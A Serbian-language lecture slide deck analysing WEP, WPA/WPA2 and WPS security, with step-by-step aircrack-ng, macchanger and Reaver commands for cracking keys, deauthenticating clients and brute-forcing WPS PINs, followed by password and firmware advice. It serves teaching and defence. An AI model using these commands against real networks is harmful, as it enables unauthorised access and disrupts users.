You are on page 1of 33

Analiza zaštite bežičnih mreža

WEP, WPA i WPA2

Dušan Stamenković, M.Sc.

Beograd, 23. decembar 2015.


Wired Equivalent Privacy
Wired Equivalent Privacy – WEP (802.11):
• Bezbednosni algoritam za bežične mreže.
• Ratifikovani standard od 1999.godine
• Prepoznatljiv je po svom ključu od 10 (64bit) ili 26 (128bit)
heksadecimalnih karaktera (0-9 i A-F – svaki karakter po 4 bita)
i Inicijalizacioni vektor od 24bit-a. Neki proizvođači
dozvoljavaju i ključ dužine 58 (256bit) heksadecimalnih
karaktera.
• RC4 kao sekvencijalni algoritam za šifrovanje.

Dva tipa WEP autentifikacije:


• Open System
• Shared Key
Wired Equivalent Privacy
Nedostaci WEP protokola:
• Inicijalizacioni Vektor se prosleđuje kao običan tekst i njegova
uloga je da spreči bilo kakva ponavljanja.
• Dužina od 24bit-nog Inicijalnog Vektora nije dovoljno dugačka
da bi se sprečilo ponavljanje na opterećenoj mreži.
• Pretpostavka je da će se 24bit-ni Inicijalizacioni Vektor
ponoviti na svakih 5000 paketa.
• Način upotrebe Inicijalnog Vektora dovodi do toga da WEP
protokol bude podložan napadima sa ključem.
WiFi Protected Access
WiFi Protected Access– WPA (802.11i):
• Poznat kao 802.11i draft (nacrt) standard.
• Ratifikovani standard od 2003.godine kao brza zamena za WEP
u iščekivanju standardizacije WPA2 protokola.
• Koristi Temporarl Key Integrity Protocol (TKIP) koji poboljšava
„pravljenje“ radnog ključa u odnosu na WEP protokol.
• Inicijalizacioni Vektor je 48bit-a (2x duži nego kod WEP-a).
• RC4 kao sekvencijalni algoritam za šifrovanje se i dalje koristi
kako bi uređaji sa slabijim hardverom podržali prelazak na
WPA jer je WEP već okarakterisan kao nebezbedan.
WiFi Protected Access 2
WiFi Protected Access 2– WPA2 (802.11i-2004):
• Naslednik WPA protokola.
• Uvodi AES algoritam za šifrovanje poruka.

Postoji više verzija ovog protokola:


• WPA-Personal (Jedna od najkorišćenijih verzija protokola, koristi PSK
(Pre Shared Key – Password).
• WPA-Enterprise (802.11x). Najčešće se koristi u poslovnim
okruženjima i za realizaciju ove verzije protokola potreban je
RADIUS server.
• WPA-WPS (Wi-Fi Protected Setup, koristi više metoda za
autentifikaciju. Jedan od metoda je korišćenje PIN-a koji se nalazi
zapisan u nekom obliku na samom ruteru. PIN je osmocifreni broj,
pa je brute-force napad izvodljiv za kratko vreme).
WEP Bezbednost
• Problem kod WEP protokola leži u samoj implementaciji RC4
algoritma koji se koristi za šifrovanje.
• Inicijalizacioni Vektor (deo materijala za Ključ) je uvek poznat i
posle nekog vremena se ponavlja, što dovodi do šifrovanja
nekih poruka sa potpuno istim Ključem. To u kriptoanalizi
dovodi do mnogih mogućnosti.
• U praksi se koristi injekcija ARP paketa kako bi se skratilo
vreme za koje će se Inicijalizacioni Vektor ponoviti i samim tim
otkriti ceo Ključ korišćen za šifrovanje paketa kao i za
autentifikaciju.
• Što je veći protok na mreži (izmedju nekog autorizovanog
klijenta i Access Point-a, napadač će brže doći do Ključa.
Demonstracija WEP Napada – Fern WiFi Cracker

• BackTrack 5 distribucija Linuxa poseduje već nekoliko


ugrađenih alata koji olakšavaju otkrivanje WEP ključa.
• Najjednostavniji za upotrebu je “fern-wifi-cracker”.
• Alat poseduje grafički interfejs i u svega par klikova može
započeti napad na mrežu obezbedjenu WEP-om.
• Fern WiFi Cracker koristi aircrack-ng grupu alata koja
predstavlja najnapredniju grupu alata kada se radi o napadima
na WEP, WPA ili WPA2 protokole. Aircrack-ng alati se pokreću
iz terminala i nisu tako jednostavni za upotrebu kao Fern WiFi
Cracker.
• Vreme potrebno za pronalazak password-a mreže
obezbeđene WEP protokolom koja ima barem jednog
aktivnog korisnika se svodi na svega nekoliko minuta.
Demonstracija WEP Napada – Fern WiFi Cracker
Fern WiFi Cracker:

•Potrebno je jednostavno
izabrati karticu koju će
alat koristiti za skeniranje,
izabrati željenu mrežu za
napad i pokrenuti neki od
ponuđenih napada.

•Nikakvo predznanje o
samim mrežama ili
protokolima nije
potrebno za korišćenje
ovog alata.
Demonstracija WEP Napada – Aircrak-ng
Potrebni alati su iz aircrack-ng grupe.
• airmon-ng (alat koji se koristi za postavljanje wireless kartice u
mod za monitoring. U ovom modu kartica može da osluškuje
saobraćaj na nekoj od mreža koje su u dometu).
• airodump-ng (alat koji prati komunikaciju na zadatoj mreži i
prijavljuje kada se neki novi korisnik autentifikovao tj. Kada je
došlo do handshake-a. Ovaj alat takođe zapisuje podatke svih
poruka komunikacije na disk tako da se napad može nastaviti bilo
kada nakon uhvaćenih potrebnih podataka).
• aireplay-ng (alat koji omogućava slanje određenih paketa ka
mrežama na koje se napadač nije autentifikovao. Dozvoljava
slanje paketa za nasilnu deautentifikaciju klijenata kako bi ih
prisilio na ponovno autentifikovanje).
• aircrack-ng (alat za pronalaženje ključa).
Demonstracija WEP Napada – Aircrak-ng
Komande koje ćemo koristiti:
airmon-ng ili iwconfig - Pregled mrežnih adaptera
ifconfig wlan1 down - Gašenje bežičnog adaptera
iwconfig wlan1 mode monitor- Postavljanje bežičnog adaptera u režim rada za
monitoring
macchanger -m 00:11:22:33:44:55 mon0 - Promena MAC adrese monitoring ad
ifconfig wlan1 up - Paljenje bežičnog adaptera
airodump-ng wlan1 - Pretraživanje svih raspoloživih bežičnih mreža
airodump-ng -w naziv_fajla -c broj_kanala --bssid mac_adresa_ap --ivs wlan1 -
Sužavanje pretrage na bežičnu mrežu na određenom kanalu i beleženje
informacija u određenom fajlu
airodump-ng -w zrmWEP -c 11 --bssid C8:D7:19:DC:50:94 --ivs wlan1 -Primer
prethodne komande
aireplay-ng -1 0 -a mac_adresa_ap wlan1 -Postavljanje MAC adr. AP-a i slanje
lažnog paketa za autorizaciju korisnika.
aireplay-ng -3 -b mac_adr_ap wlan1 -Serijsko slanje ARP zahteva na MAC adr. AP-a
aircrack-ng naziv_fajla - Pokretanje razbijanja lozinke na osnovu pristiglih paketa
aircrack-ng zrmWEP.ivs - Primer prethodne komande
Demonstracija WEP Napada – Postavljanje
virtualnog adaptera u režim rada za monitoring
Demonstracija WEP Napada – Skeniranje svih
aktivnih bežičnih mreža u dometu
Demonstracija WEP Napada – Postavljanje
adaptera da osluškuje i snima saobraćaj odabrane
mreže
Demonstracija WEP Napada – Slanje zahteva za
autorizaciju i serijsko slanje ARP zahteva
Demonstracija WEP Napada – Ključ
WPA i WPA2 Bezbednost

• Kod određenih implementacija WPA protokola, postoji propust


koji omogućava napadaču da dešifruje delove saobraćaja između
Access Point-a i korisnika.
• Propust su otkrili Nemački naučnici Eric Tews i Martin Beck.
• Ovaj napad je unapređen od strane više naučnika ali ni u jednoj
verziji ovog napada nije moguće doći do samog Ključa –
passworda, koji se koristi za autentifikaciju i šifrovanje poruka.
• WPA se i dalje smatra bezbednim protokolom i u normalnoj je
upotrebi. Višestruko je brži od WPA2 protokola, pa je samim tim i
jedini izbor na nekim starijim Access Point-ima.
WPA i WPA2 Bezbednost

• Poznato je da je jedini način za napad na mreže obezbeđene WPA


i WPA2 protokolima, koji omogućava pronalazak Ključa –
passworda, brute-force napad ili napad po rečniku.
• Jedini način za izvođenje ovakvog napada je način koji
podrazumeva “hvatanje” handshake poruka između korisnika koji
pristupa mreži, a zna password za pristup, i Access Point-a.
• Najnapredniji alati za realizaciju ovog napada su aircrack-ng grupa
alata, korišćeni na nekoj od distribucija Linux operativnog
sistema.
Demonstracija WPA/WPA2 Napada – Aircrak-ng
Komande koje ćemo koristiti:
airmon-ng ili iwconfig - Pregled mrežnih adaptera
ifconfig wlan1 down - Gašenje bežičnog adaptera
iwconfig wlan1 mode monitor- Postavljanje bežičnog adaptera u režim rada za
monitoring
macchanger -m 00:11:22:33:44:55 mon0 - Promena MAC adrese monitoring ad
ifconfig wlan1 up - Paljenje bežičnog adaptera
airodump-ng wlan1 - Pretraživanje svih raspoloživih bežičnih mreža
airodump-ng -w naziv_fajla -c broj_kanala --bssid mac_adresa_ap --ivs wlan1 -
Sužavanje pretrage na bežičnu mrežu na određenom kanalu i beleženje
informacija u određenom fajlu
airodump-ng -w zrmWPA2 -c 11 --bssid C8:D7:19:DC:50:94 --ivs wlan1 -Primer
prethodne komande
aireplay-ng -0 1 -e naziv_ap –c mac_adresa_korisnika wlan1 –Postavljanje naziva
AP-a i slanje jednog test paketa gde -0 oznavačava deautorizaciju korisnika -c
aireplay-ng -0 10 -e naziv_ap wlan1 -Serijsko slanje paketa na MAC adr. AP
aircrack-ng -w '/root/Desktop/darkc0de.lst' '/root/Desktop/root/zrmWPA-01.ivs‘
Demonstracija WPA/WPA2 napad – Postavljanje
virtualnog adaptera u režim rada za monitoring
Demonstracija WPA/WPA2 napad – Skeniranje
svih aktivnih bežičnih mreža u dometu
Demonstracija WPA/WPA2 napad – Postavljanje
virtualnog adaptera da osluškuje i snima saobraćaj
odabrane mreže
Demonstracija WPA/WPA2 napad – Slanje paketa
za deautorizaciju korisnika i prikaz ponovne
autorizacije (WPA handshake)
Demonstracija WPA/WPA2 napad – Postavljanje
napada rečnikom i tražena lozinka
WPA i WPA2 Bezbednost
Napad se izvršava jednostavno čak i uz minimalno poznavanje Linux okruženja.
• Najslabija komponenta napada, i u isto vreme komponenta od koje zavisi uspeh
napada je rečnik.
• Možemo koristiti i rečnike koji imaju milione reči, a da i pored toga ne
pronađemo lozinku mreže koju napadamo.
• Sa druge strane pretraga po takvom rečniku zahteva puno vremena (nekada se
može meriti i u danima), i i dalje postoji mogućnost da taj rečnik ne sadrži
lozinku kojim je zaštićena mreža.
• Za sigurno uspešan napad potrebno je koristiti brute-force metod pretrage. To
je metod koji će isprobati sve moguće kombinacije sa zadatim alfabetom za
zadatu dužinu reči – lozinke. Ovaj metod je toliko vremenski zahtevan da
jednom prosečnom računaru treba 4 dana da isproba sve kombinacije malih
slova engleskog alfabeta sa dužinom reči od 6 karaktera koristeći alat HashCat.
• aircrack-ng ne poseduje brute-force metod napada.
• Moguće je exportovati ’’uhvaćene’’ handshake poruke u neki od formata koji
koriste alati za brute-force pretragu.
• Jedan od najpoznatijih alata koji poseduje mogućnost brute-force pretrage je
HashCat. Poseduje grafički interfejs i mnogo prednosti vezanih za samu
pretragu u odnosu na aircrack-ng.
Wi-Fi Protected Setup (WPS)
• Opcija koja postoji na većini rutera.
• Osnovna podešavanja WiFi rutera dozvoljavaju autentifikaciju
korisnika putem PIN-a (osmocifreni broj zapisan na ruteru)
paralelno sa WPA ili WPA2 lozinkama.
• Ranjivost ovog sistema bezbednosti je evidentna, jer ciljani napad
može lako razbiti PIN od osam cifara.
• Strpljenje napadača je od presudnog značaja.
• Neki od alata koji se koriste za napad su:
• Reaver (sporiji, podržava sve WiFi uređaje)
• WPScrack (brži, podržava samo najpoznatije brendove)
• WiFite (kompletno rešenje, brz i podržava sve WiFi uređaje)
Demonstracija WPS napad – Reaver

Komande koje ćemo koristiti:


• apt-get update && apt-get install reaver (dolazi sa Kali Linux)
• wash –i wlan1 (pregled dostupnih AP sa otključanim WPS-om)
• reaver –i wlan1 –b C0:C1:C0:78:3C:B8 –vv (napad)

Posle određenog vremena, dobićemo povratnu informaciju o PIN-


u za autentifikaciju, ali i lozinku za WPA/WPA2 način pristupanja.
Demonstracija WPS napad – Reaver
Demonstracija WPS napad – Reaver
Demonstracija WPS napad – Reaver
Demonstracija WPS napad – WiFite
Demonstracija WPS napad – WiFite
WPA i WPA2 Bezbednost
• Zato što se bezbednost WPA i WPA2 protokola zasniva na jačini lozinke (broj
karaktera, originalnost lozinke), potrebno je smišljati lozinke koje se sastoje od
karaktera i znakova koji se u takvoj kombinaciji ne mogu naći u rečniku nekog
jezika (pošto iz takvih rečnika potiče većina reči u rečnicima za napad). Dakle
potrebno je praviti komplikovane lozinke koje sa druge strane ljudi mogu lako
pamtiti. Kako to izvesti?

• Npr. Lozinka ’’Singidunum’’ ili ’’password’’ predstavlja reč koja će se lako naći u
nekom rečniku (bilo u rečniku sastavljenom samo za napade, bilo u normalnom
rečniku engleskog ili srpskog jezika), pa tako predstavlja reč koju će napadač sa
velikom verovatnoćom otkriti.

• Ako bismo umesto ’’Singidunum’’ kao lozinku upisali npr. ’’s1ng1dynym’’, mi


bismo je opet lako zapamtili, ali se kao takva sigurno ne bi našla ni u jednom
rečniku. Jedini način da se ovakva lozinka pronađe bi bilo korišćenje brute-
force metoda pretrage što bi za ovih 10 karaktera, koristeći alfabet i brojeve, na
jednom računaru trajalo i duže od godinu dana = neizvodljivo!
WPA i WPA2 Bezbednost
• Sa druge strane, veliki problem bezbednosti ovih protokola pravi
WPS, koji je izuzetno ranjiv. PIN je „hard code“-ovan u firmware-u
svakog WiFi uređaja koji poseduje WPS opciju.
• Čak i ako ga onemogućimo, napad putem Reaver-a ili sličnog alata
je moguć i za kraće vreme uspešan.
• Filtriranje po MAC adresama? Napadač uvek može lažirati svoju
adresu i preuzeti nečiju ko je već autentifikovan na ciljanu mrežu.
• U prednosti su korisnici čiji WiFi uređaj nema opciju za WPS, a oni
čiji uređaj ima ovu opciju, preporuka je zamena fabričkog
firmware-a sa kastomiziranim kao što je npr. DD-WRT koji sam po
sebi nema WPS kao opciju, a nudi veći broj drugih opcija (VPN)
koje fabrički ne podržava.

You might also like